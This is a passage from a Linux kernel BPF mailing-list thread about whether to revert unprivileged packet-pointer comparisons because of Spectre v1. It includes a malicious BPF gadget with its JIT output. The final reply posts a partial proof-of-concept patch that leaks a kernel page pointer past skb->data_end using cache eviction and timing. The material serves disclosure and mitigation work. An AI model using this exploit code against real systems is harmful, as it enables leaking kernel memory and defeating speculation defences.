> On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>
>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>
>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>> constant pointer bounds, which can then be enforced by rewriting pointer
>> arithmetic [1] or index masking [2]. This relies on the fact that every
>> memory region to be accessed has a static upper bound and every date
>> below that bound is accessible. The verifier can only rewrite pointer
>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>> static upper bound, below of which every access is valid, can be given.
>>
>> When allowing packet pointer comparisons, this introduces a way for the
>> program to effectively construct an accessible pointer for which no
>> static upper bound is known. Intuitively, this is obvious as a packet
>> might be of any size and therefore 0 is the only statically known upper
>> bound below of which every date is always accessible (i.e., none).
>>
>> To clarify, the problem is not that comparing two pointers can be used
>> for pointer leaks in the same way in that comparing a pointer to a known
>> scalar can be used for pointer leaks. That is because the "secret"
>> components of the addresses cancel each other out if the pointers are
>> into the same region.
>>
>> With [3] applied, the following malicious BPF program can be loaded into
>> the kernel without CAP_PERFMON:
>>
>> r2 = *(u32 *)(r1 + 76) // data
>> r3 = *(u32 *)(r1 + 80) // data_end
>> r4 = r2
>> r4 += 1
>> if r4 > r3 goto exit
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> r5 &= 1 // choose bit to leak
>> // ... side channel to leak secret bit
>> exit:
>> // ...
>>
>> This is jited to the following amd64 code which still contains the
>> gadget:
>>
>>     0:   endbr64
>>     4:   nopl   0x0(%rax,%rax,1)
>>     9:   xchg   %ax,%ax
>>     b:   push   %rbp
>>     c:   mov    %rsp,%rbp
>>     f:   endbr64
>>    13:   push   %rbx
>>    14:   mov    0xc8(%rdi),%rsi // data
>>    1b:   mov    0x50(%rdi),%rdx // data_end
>>    1f:   mov    %rsi,%rcx
>>    22:   add    $0x1,%rcx
>>    26:   cmp    %rdx,%rcx
>>    29:   ja     0x000000000000003f // branch to mispredict
>>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>    30:   and    $0x1,%r8 // choose bit to leak
>>    34:   xor    %ebx,%ebx
>>    36:   cmp    %rbx,%r8
>>    39:   je     0x000000000000003f // branch based on secret
>>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>    3f:   xor    %eax,%eax
>>    41:   pop    %rbx
>>    42:   leaveq
>>    43:   retq
>>
>> Here I'm using a port contention side channel because storing the secret
>> to the stack causes the verifier to insert an lfence for unrelated
>> reasons (SSB mitigation) which would terminate the speculation.
>>
>> As Daniel already pointed out to me, data_end is even attacker
>> controlled as one could send many packets of sufficient length to train
>> the branch prediction into assuming data_end >= data will never be true.
>> When the attacker then sends a packet with insufficient data, the
>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>> data_end.
>>
>> To make it clear that the problem is not the pointer comparison but the
>> missing masking instruction, it can be useful to transform the code
>> above into the following equivalent pseudocode:
>>
>> r2 = data
>> r3 = data_end
>> r6 = ... // index to access, constant does not help
>> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
>> if !(r6 < r7) goto exit
>> // no masking of index in r6 happens
>> r2 += r6 // addr. to access
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> // ... leak secret as above
>>
>> One idea to resolve this while still allowing for unprivileged packet
>> access would be to always allocate a power of 2 for the packet data and
>> then also pass the respective index mask in the skb structure. The
>> verifier would then have to check that this index mask is always applied
>> to the offset before a packet pointer is dereferenced. This patch does
>> not implement this extension, but only reverts [3].
> 
> Hi Luis,
> 
> The skb pointer comparison is a reasonable operation in a networking bpf prog.
> If we just prohibit a reasonable operation to prevent a possible
> spectre v1 attack, it looks a little weird, right ?
> Should we figure out a real fix to prevent it ?
> 

I see your point, but this has been the case since Spectre v1 was
mitigated for BPF. I actually did a few statistics on that in [1]: more
than 50 out of ~350 programs are rejected because of the Spectre v1
mitigations. However, to repeat: the operation is not completely
prohibited, it is only prohibited without CAP_PERFMON.

Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX 
flags in sysfs? It would be helpful for debugging, and you could set it 
to 1 permanently for your purposes. However, I'm not sure if the others 
would like that...

Another solution I have been working on in [2] is to change the 
mitigations to insert an lfence instead of rejecting the program 
entirely. That would have bad performance, but would still be better 
than completely rejecting the program. However, these patches are far 
from going upstream currently.
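
To illustrate the effect on the gadget (userspace-C sketch only; this is
not the rewrite [2] actually performs):

static unsigned char read_pkt_byte_fenced(const unsigned char *data,
					  const unsigned char *data_end)
{
	if (data + 1 > data_end)
		return 0;
	/* Speculation barrier: on x86, no later instruction starts
	 * executing until all prior instructions (including the bounds
	 * check) have completed, so the out-of-bounds byte is never read
	 * speculatively. */
	asm volatile("lfence" ::: "memory");
	return *data;
}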

A detail: the patches in [2] currently do not support the case we are
discussing here; they only insert fences when the speculative paths fail
to verify.

[1] https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf - Slide 9
[2] https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
Yafang Shao Sept. 19, 2023, 3:43 a.m. UTC | #7
On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst <gerhorst@cs.fau.de> wrote:
>
> On 15/09/2023 04:26, Yafang Shao wrote:
> > On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
> >>
> >> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
> >>
> >> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> >> constant pointer bounds, which can then be enforced by rewriting pointer
> >> arithmetic [1] or index masking [2]. This relies on the fact that every
> >> memory region to be accessed has a static upper bound and every date
> >> below that bound is accessible. The verifier can only rewrite pointer
> >> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> >> static upper bound, below of which every access is valid, can be given.
> >>
> >> When allowing packet pointer comparisons, this introduces a way for the
> >> program to effectively construct an accessible pointer for which no
> >> static upper bound is known. Intuitively, this is obvious as a packet
> >> might be of any size and therefore 0 is the only statically known upper
> >> bound below of which every date is always accessible (i.e., none).
> >>
> >> To clarify, the problem is not that comparing two pointers can be used
> >> for pointer leaks in the same way in that comparing a pointer to a known
> >> scalar can be used for pointer leaks. That is because the "secret"
> >> components of the addresses cancel each other out if the pointers are
> >> into the same region.
> >>
> >> With [3] applied, the following malicious BPF program can be loaded into
> >> the kernel without CAP_PERFMON:
> >>
> >> r2 = *(u32 *)(r1 + 76) // data
> >> r3 = *(u32 *)(r1 + 80) // data_end
> >> r4 = r2
> >> r4 += 1
> >> if r4 > r3 goto exit
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> r5 &= 1 // choose bit to leak
> >> // ... side channel to leak secret bit
> >> exit:
> >> // ...
> >>
> >> This is jited to the following amd64 code which still contains the
> >> gadget:
> >>
> >>     0:   endbr64
> >>     4:   nopl   0x0(%rax,%rax,1)
> >>     9:   xchg   %ax,%ax
> >>     b:   push   %rbp
> >>     c:   mov    %rsp,%rbp
> >>     f:   endbr64
> >>    13:   push   %rbx
> >>    14:   mov    0xc8(%rdi),%rsi // data
> >>    1b:   mov    0x50(%rdi),%rdx // data_end
> >>    1f:   mov    %rsi,%rcx
> >>    22:   add    $0x1,%rcx
> >>    26:   cmp    %rdx,%rcx
> >>    29:   ja     0x000000000000003f // branch to mispredict
> >>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
> >>    30:   and    $0x1,%r8 // choose bit to leak
> >>    34:   xor    %ebx,%ebx
> >>    36:   cmp    %rbx,%r8
> >>    39:   je     0x000000000000003f // branch based on secret
> >>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
> >>    3f:   xor    %eax,%eax
> >>    41:   pop    %rbx
> >>    42:   leaveq
> >>    43:   retq
> >>
> >> Here I'm using a port contention side channel because storing the secret
> >> to the stack causes the verifier to insert an lfence for unrelated
> >> reasons (SSB mitigation) which would terminate the speculation.
> >>
> >> As Daniel already pointed out to me, data_end is even attacker
> >> controlled as one could send many packets of sufficient length to train
> >> the branch prediction into assuming data_end >= data will never be true.
> >> When the attacker then sends a packet with insufficient data, the
> >> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> >> data_end.
> >>
> >> To make it clear that the problem is not the pointer comparison but the
> >> missing masking instruction, it can be useful to transform the code
> >> above into the following equivalent pseudocode:
> >>
> >> r2 = data
> >> r3 = data_end
> >> r6 = ... // index to access, constant does not help
> >> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
> >> if !(r6 < r7) goto exit
> >> // no masking of index in r6 happens
> >> r2 += r6 // addr. to access
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> // ... leak secret as above
> >>
> >> One idea to resolve this while still allowing for unprivileged packet
> >> access would be to always allocate a power of 2 for the packet data and
> >> then also pass the respective index mask in the skb structure. The
> >> verifier would then have to check that this index mask is always applied
> >> to the offset before a packet pointer is dereferenced. This patch does
> >> not implement this extension, but only reverts [3].
> >
> > Hi Luis,
> >
> > The skb pointer comparison is a reasonable operation in a networking bpf prog.
> > If we just prohibit a reasonable operation to prevent a possible
> > spectre v1 attack, it looks a little weird, right ?
> > Should we figure out a real fix to prevent it ?
> >
>
> I see your point, but this has been the case since Spectre v1 was
> mitigated for BPF. I actually did a few statistics on that in [1] and
>  >50 out of ~350 programs are rejected because of the Spectre v1
> mitigations. However, to repeat: The operation is not completely
> prohibited, only prohibited without CAP_PERFMON.
>
> Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX
> flags in sysfs? It would be helpful for debugging, and you could set it
> to 1 permanently for your purposes. However, I'm not sure if the others
> would like that...

I really appreciate that idea. I actually shared a similar concept earlier [1].
Nonetheless, I believe it would be prudent to align with the system
settings regarding CPU security mitigations within the BPF subsystem
as well. In our production environment, we consistently configure it
with "mitigations=off"[2] to enhance performance, essentially
deactivating all optional CPU mitigations. Consequently, if we
implement a system-wide "mitigations=off" setting, it should also
inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.

Alexei, Daniel, any comments?

[1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F60kg@mail.gmail.com/
[2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html

>
> Another solution I have been working on in [2] is to change the
> mitigations to insert an lfence instead of rejecting the program
> entirely. That would have bad performance, but would still be better
> than completely rejecting the program. However, these patches are far
> from going upstream currently.
>
> A detail: The patches in [2] currently do not support the case we are
> discussing here, they only insert fences when the speculative paths fail
> to verify.
>
> [1]
> https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf
> - Slide 9
> [2]
> https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
>
> --
> Luis



--
Regards
Yafang
Daniel Borkmann Sept. 19, 2023, 6:43 a.m. UTC | #8
On 9/19/23 5:43 AM, Yafang Shao wrote:
> On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst <gerhorst@cs.fau.de> wrote:
>> On 15/09/2023 04:26, Yafang Shao wrote:
>>> On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>>>
>>>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>>>
>>>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>>>> constant pointer bounds, which can then be enforced by rewriting pointer
>>>> arithmetic [1] or index masking [2]. This relies on the fact that every
>>>> memory region to be accessed has a static upper bound and every date
>>>> below that bound is accessible. The verifier can only rewrite pointer
>>>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>>>> static upper bound, below of which every access is valid, can be given.
>>>>
>>>> When allowing packet pointer comparisons, this introduces a way for the
>>>> program to effectively construct an accessible pointer for which no
>>>> static upper bound is known. Intuitively, this is obvious as a packet
>>>> might be of any size and therefore 0 is the only statically known upper
>>>> bound below of which every date is always accessible (i.e., none).
>>>>
>>>> To clarify, the problem is not that comparing two pointers can be used
>>>> for pointer leaks in the same way in that comparing a pointer to a known
>>>> scalar can be used for pointer leaks. That is because the "secret"
>>>> components of the addresses cancel each other out if the pointers are
>>>> into the same region.
>>>>
>>>> With [3] applied, the following malicious BPF program can be loaded into
>>>> the kernel without CAP_PERFMON:
>>>>
>>>> r2 = *(u32 *)(r1 + 76) // data
>>>> r3 = *(u32 *)(r1 + 80) // data_end
>>>> r4 = r2
>>>> r4 += 1
>>>> if r4 > r3 goto exit
>>>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>>>> r5 &= 1 // choose bit to leak
>>>> // ... side channel to leak secret bit
>>>> exit:
>>>> // ...
>>>>
>>>> This is jited to the following amd64 code which still contains the
>>>> gadget:
>>>>
>>>>      0:   endbr64
>>>>      4:   nopl   0x0(%rax,%rax,1)
>>>>      9:   xchg   %ax,%ax
>>>>      b:   push   %rbp
>>>>      c:   mov    %rsp,%rbp
>>>>      f:   endbr64
>>>>     13:   push   %rbx
>>>>     14:   mov    0xc8(%rdi),%rsi // data
>>>>     1b:   mov    0x50(%rdi),%rdx // data_end
>>>>     1f:   mov    %rsi,%rcx
>>>>     22:   add    $0x1,%rcx
>>>>     26:   cmp    %rdx,%rcx
>>>>     29:   ja     0x000000000000003f // branch to mispredict
>>>>     2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>>>     30:   and    $0x1,%r8 // choose bit to leak
>>>>     34:   xor    %ebx,%ebx
>>>>     36:   cmp    %rbx,%r8
>>>>     39:   je     0x000000000000003f // branch based on secret
>>>>     3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>>>     3f:   xor    %eax,%eax
>>>>     41:   pop    %rbx
>>>>     42:   leaveq
>>>>     43:   retq
>>>>
>>>> Here I'm using a port contention side channel because storing the secret
>>>> to the stack causes the verifier to insert an lfence for unrelated
>>>> reasons (SSB mitigation) which would terminate the speculation.
>>>>
>>>> As Daniel already pointed out to me, data_end is even attacker
>>>> controlled as one could send many packets of sufficient length to train
>>>> the branch prediction into assuming data_end >= data will never be true.
>>>> When the attacker then sends a packet with insufficient data, the
>>>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>>>> data_end.
>>>>
>>>> To make it clear that the problem is not the pointer comparison but the
>>>> missing masking instruction, it can be useful to transform the code
>>>> above into the following equivalent pseudocode:
>>>>
>>>> r2 = data
>>>> r3 = data_end
>>>> r6 = ... // index to access, constant does not help
>>>> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
>>>> if !(r6 < r7) goto exit
>>>> // no masking of index in r6 happens
>>>> r2 += r6 // addr. to access
>>>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>>>> // ... leak secret as above
>>>>
>>>> One idea to resolve this while still allowing for unprivileged packet
>>>> access would be to always allocate a power of 2 for the packet data and
>>>> then also pass the respective index mask in the skb structure. The
>>>> verifier would then have to check that this index mask is always applied
>>>> to the offset before a packet pointer is dereferenced. This patch does
>>>> not implement this extension, but only reverts [3].
>>>
>>> Hi Luis,
>>>
>>> The skb pointer comparison is a reasonable operation in a networking bpf prog.
>>> If we just prohibit a reasonable operation to prevent a possible
>>> spectre v1 attack, it looks a little weird, right ?
>>> Should we figure out a real fix to prevent it ?
>>>
>>
>> I see your point, but this has been the case since Spectre v1 was
>> mitigated for BPF. I actually did a few statistics on that in [1] and
>>   >50 out of ~350 programs are rejected because of the Spectre v1
>> mitigations. However, to repeat: The operation is not completely
>> prohibited, only prohibited without CAP_PERFMON.
>>
>> Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX
>> flags in sysfs? It would be helpful for debugging, and you could set it
>> to 1 permanently for your purposes. However, I'm not sure if the others
>> would like that...
> 
> I really appreciate that idea. I actually shared a similar concept earlier.[1].
> Nonetheless, I believe it would be prudent to align with the system
> settings regarding CPU security mitigations within the BPF subsystem
> as well. In our production environment, we consistently configure it
> with "mitigations=off"[2] to enhance performance, essentially
> deactivating all optional CPU mitigations. Consequently, if we
> implement a system-wide "mitigations=off" setting, it should also
> inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.
> 
> Alexei, Daniel, any comments ?

Yes, I think that would be acceptable as a global override. At least I
don't see how it would make anything worse if the rest of the system has
mitigations disabled anyway.

> [1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F60kg@mail.gmail.com/
> [2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html
> 
>> Another solution I have been working on in [2] is to change the
>> mitigations to insert an lfence instead of rejecting the program
>> entirely. That would have bad performance, but would still be better
>> than completely rejecting the program. However, these patches are far
>> from going upstream currently.
>>
>> A detail: The patches in [2] currently do not support the case we are
>> discussing here, they only insert fences when the speculative paths fail
>> to verify.
>>
>> [1]
>> https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf
>> - Slide 9
>> [2]
>> https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
>>
>> --
>> Luis
> 
> 
> 
> --
> Regards
> Yafang
>
Alexei Starovoitov Sept. 19, 2023, 8:57 a.m. UTC | #9
On Mon, Sep 18, 2023 at 4:26 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> It is true that this is not easily possible using the method most exploits use,
> at least to my knowledge (i.e., accessing the same address from another core).
> However, it is still possible to evict the cacheline with skb->data/data_end
> from the cache in between the loads by iterating over a large map using
> bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
> readily available in a callee-saved register.

...

> call %[bpf_loop]; \
> gadget_%=: \
> r2 = *(u32 *)(r7 + 80);   \
> if r2 <= r9 goto exit_%=; \

r9 is supposed to be available in the callee-saved register? :)
I think you're missing that it is _callee_ saved.
If that bpf_loop indeed managed to flush L1 cache the
refill of r9 in the epilogue would be a cache miss.
And r7 will be a cache miss as well.
So there is no chance the CPU will execute 'if r2 <= r9' speculatively.

I have to agree that the above approach sounds plausible in theory
and I've never seen anyone propose to mispredict a branch
this way. Which also means that no known speculation attack
was crafted. I suspect that's a strong sign that
the above approach is indeed a theory and it doesn't work in practice.
Likely because the whole cache is flushed, the subsequent misses
will spoil all speculation. For spec v1 to work you need
only one slow load on one side of that branch.
The other load and the speculative code after it should not miss.
When they do, the spec code won't be able to leave the breadcrumbs
of the leaked bit in the cache.
'Leak a full byte' is also 'wishful thinking' imo.
I haven't seen any attack that leaks a byte at a time.

So I will insist on seeing a full working exploit before doing
anything else here. It's good to discuss these CPU speculation
concerns, but we have to stay practical.
Even removing BPF from the picture, there is so much code
in the network core that checks packet boundaries.
One can find plenty of cases of 'read past skb->end'
under speculation and I'm arguing none of them are exploitable.
Luis Gerhorst Sept. 28, 2023, 11:09 a.m. UTC | #10
On Tue, 19 Sep 2023 01:57:21 -0700 Alexei Starovoitov wrote:
> r9 is supposed to be available in the callee-saved register? :)
> I think you're missing that it is _callee_ saved.

I'm sorry, I guess this was not clear enough; the idea was that this
register is not used by the callee and therefore also does not have
to be restored. Anyway, this does not appear to be important (I guess
because the return has to pull the stack into the cache anyway), see
below.

> If that bpf_loop indeed managed to flush L1 cache the
> refill of r9 in the epilogue would be a cache miss.
> And r7 will be a cache miss as well.
> So there is no chance cpu will execute 'if r2 <= r9' speculatively.
>
> I have to agree that the above approach sounds plausible in theory
> and I've never seen anyone propose to mispredict a branch
> this way. Which also means that no known speculation attack
> was crafted. I suspect that's a strong sign that
> the above approach is indeed a theory and it doesn't work in practice.
> Likely because the whole cache is flushed the subsequent misses
> will spoil all speculation. For spec v1 to work you need
> only one slow load in one side of that branch.
> The other load and the speculative code after should not miss.
> When it does the spec code won't be able to leave the breadcrumbs
> of the leaked bit in the cache.
> 'Leak full byte' is also 'wishful thinking' imo.
> I haven't seen any attack that leaks byte at-a-time.
>
> So I will insist on seeing a full working exploit before doing
> anything else here. It's good to discuss this cpu speculation
> concerns, but we have to stay practical.

I tried this, and below you find a patch that leaks the otherwise
inaccessible skb_shinfo(skb)->frags[0].bv_page, which lies 196 bytes
behind skb->data_end, from userspace at 100B/h.

However, you are right in that there does not appear to be anything extremely
useful behind skb->data_end: destructor_arg is NULL in my setup, and I
have also not found any code putting a static pointer there. Therefore,
if it stays like this and we are sure the allocator introduces
sufficient randomness to make OOB reads useless, the original patches
can stay. If you decide to do this, I will be happy to craft a patch that
documents that the respective structs should be considered 'public'
under Spectre v1 to make sure nobody puts anything sensitive there.

The exploit (if you consider leaking a struct page * an exploit) does
not leak more than one bit per mispredict (I did not try that), but
flushing data_end from the cache using bpf_loop() indeed appears to have
the desired effect (if you remove it, it doesn't work).

> One can find plenty of cases of 'read past skb->end'
> under speculation and I'm arguing none of them are exploitable.

I have not looked into those but I guess flushing the cache in between
the loads does not happen there.

Here's a shortened session log for using the patch below:

$ lsb_release -a
Description:    Debian GNU/Linux 11 (bullseye)
$ uname -a
Linux $HOST 5.10.0-25-cloud-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
$ lscpu
Socket(s):                          2
Model name:                         Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz
Virtualization:                     VT-x
Vulnerability Spectre v1:           Mitigation; usercopy/swapgs barriers and __user pointer sanitization
$ stress-ng --cache $(nproc) --cache-level 3 &
$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    0.297557] smpboot: CPU0: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (family: 0x6, model: 0x4f, stepping: 0x1)
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffdd2f04159400

You can already see that this looks like a pointer. To also let the
kernel print the actual value, remove the '#if 0' in cls_bpf_classify().
With that you can check whether the middle bits are correct:

$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    2.399485] kernel skb_shinfo(skb)->frags[0].bv_page
[    2.399485]  *(ffff8a7541154670 ?= data+366 = ffff8a7541154670) = ffffe387c4155e00
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffe387c4155e00
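
For completeness, the userspace decision logic that produces this guess
is roughly the following (condensed from exploit() and tc_bpf_non_root()
in the patch; delta[0] and delta[1] are the timed accesses to leakmap[0]
and leakmap[512], and error handling is omitted):

	/* Per sample: the leakmap entry the gadget touched is faster. */
	if (delta[0] > delta[1])	/* leakmap[512] cached -> bit set */
		t0 += 1000;
	else
		t1 += 1000;

	/* Per (byte, bit), after enough conclusive samples: */
	long long d = t0 - t1;
	__u64 b = d < 0 ? 0 : 1;	/* t0 > t1 -> bit leaked as 1 */
	qw |= b << (byte * 8 + bit);	/* assemble guess, little endian */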

Misc: Please make sure you always reply-to/cc gerhorst@cs.fau.de as
gerhorst@amazon.de will become unmonitored shortly.

Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
---
 net/sched/cls_bpf.c                           |  22 ++
 .../testing/selftests/bpf/prog_tests/tc_bpf.c | 334 +++++++++++++++++-
 .../testing/selftests/bpf/progs/test_tc_bpf.c |  78 +++-
 .../selftests/bpf/progs/test_tc_bpf_pkt_ptr.h | 172 +++++++++
 .../bpf/progs/test_tc_bpf_pkt_ptr_byte.h      |  31 ++
 5 files changed, 625 insertions(+), 12 deletions(-)
 mode change 100644 => 100755 tools/testing/selftests/bpf/prog_tests/tc_bpf.c
 mode change 100644 => 100755 tools/testing/selftests/bpf/progs/test_tc_bpf.c
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h

diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 382c7a71f81f..ef36ebca3b11 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb,
 			__skb_push(skb, skb->mac_len);
 			bpf_compute_data_pointers(skb);
 			filter_res = bpf_prog_run(prog->filter, skb);
+
+#if 0
+			// Print after program to not mess with the cache.
+			static atomic_t init = ATOMIC_INIT(0);
+			if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) {
+				barrier_nospec();
+				struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb;
+				pr_err_ratelimited(
+					"skb = %px, skb_headlen(skb) = %d\n"
+					"data *(%px) = %px\n"
+					"data_end *(%px) = %px\n"
+					"kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n",
+					skb, skb_headlen(skb),
+					&(skb->data), skb->data,
+					&(cb->data_end), cb->data_end,
+					&skb_shinfo(skb)->frags[0].bv_page,
+					((char *) skb->data) + 366,
+					skb_shinfo(skb)->frags[0].bv_page
+				);
+			}
+#endif
+
 			__skb_pull(skb, skb->mac_len);
 		} else {
 			bpf_compute_data_pointers(skb);
diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
old mode 100644
new mode 100755
index 48b55539331e..ec82e95895b5
--- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
+++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
@@ -2,6 +2,8 @@
 
 #include <test_progs.h>
 #include <linux/pkt_cls.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
 
 #include "cap_helpers.h"
 #include "test_tc_bpf.skel.h"
@@ -395,6 +397,251 @@ void tc_bpf_root(void)
 	test_tc_bpf__destroy(skel);
 }
 
+static void die(char *s)
+{
+	perror(s);
+	exit(1);
+}
+
+#define SERVER "127.0.0.1"
+#define BUFLEN (128 * 1024)
+#define PORT 8888
+
+static int client(struct sockaddr_in *si_other) {
+	static int s = -1;
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) si_other, 0, sizeof(*si_other));
+	si_other->sin_family = AF_INET;
+	si_other->sin_port = htons(PORT);
+
+	if (inet_aton(SERVER , &si_other->sin_addr) == 0) {
+		fprintf(stderr, "inet_aton() failed\n");
+		exit(1);
+	}
+
+	return s;
+}
+
+static int server(void) {
+	struct sockaddr_in si_me;
+	int s;
+
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) &si_me, 0, sizeof(si_me));
+
+	si_me.sin_family = AF_INET;
+	si_me.sin_port = htons(PORT);
+	si_me.sin_addr.s_addr = htonl(INADDR_ANY);
+
+	if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) {
+		die("bind");
+	}
+
+	return s;
+}
+
+static int client_ping(int s, struct sockaddr_in *si_other, size_t n) {
+	unsigned int slen = sizeof(*si_other);
+	static char message[BUFLEN] = {};
+	memset(message, 0x37, n);
+
+	if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) {
+		die("sendto()");
+	}
+
+	return 0;
+}
+
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define EI_MASK(BYTE, MASK)			\
+	else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK));
+
+#define EI_BYTE(BYTE) \
+	EI_MASK(BYTE, 1) \
+	EI_MASK(BYTE, 2) \
+	EI_MASK(BYTE, 4) \
+	EI_MASK(BYTE, 8) \
+	EI_MASK(BYTE, 16) \
+	EI_MASK(BYTE, 32) \
+	EI_MASK(BYTE, 64) \
+	EI_MASK(BYTE, 128)
+
+static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total,
+				   long long *t0, long long *t1, int offset, int mask) {
+	DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS);
+
+	int fd;
+	if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1);
+	EI_BYTE(366)
+	EI_BYTE(367)
+	EI_BYTE(368)
+	EI_BYTE(369)
+	EI_BYTE(370)
+	EI_BYTE(371)
+	EI_BYTE(372)
+	EI_BYTE(373)
+	else {
+		errno = EINVAL;
+		die("mask/offset");
+	}
+
+	DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd);
+	int ret;
+
+	ret = bpf_tc_hook_create(&hook);
+	ret = ret == -EEXIST ? 0 : ret;
+	if (ret) {
+		errno = -ret;
+		perror("hook create");
+		if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)"))
+			goto destroy;
+	}
+
+	ret = bpf_tc_attach(&hook, &opts);
+	if (ret)
+		if (!ASSERT_OK(ret, "bpf_tc_attach"))
+			goto end;
+
+	int ss = server();
+	struct sockaddr_in si_server;
+	int cs = client(&si_server);
+
+	client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0
+
+#define LEAKMAP_ENTRIES (5 * 512)
+
+	for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) {
+		__u32 key = i;
+		__s64 value = -i;
+		ret = bpf_map__update_elem(skel->maps.leakmap,
+								   &key, sizeof(key),
+								   &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_leak"))
+				goto end;
+		}
+	}
+
+// for 128KiB L1d, 90MiB L3, 1536-entry STLB
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+	for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) {
+		__u32 index = i / 8;
+		__u32 key = i + (index % 8);
+		__u64 value = i;
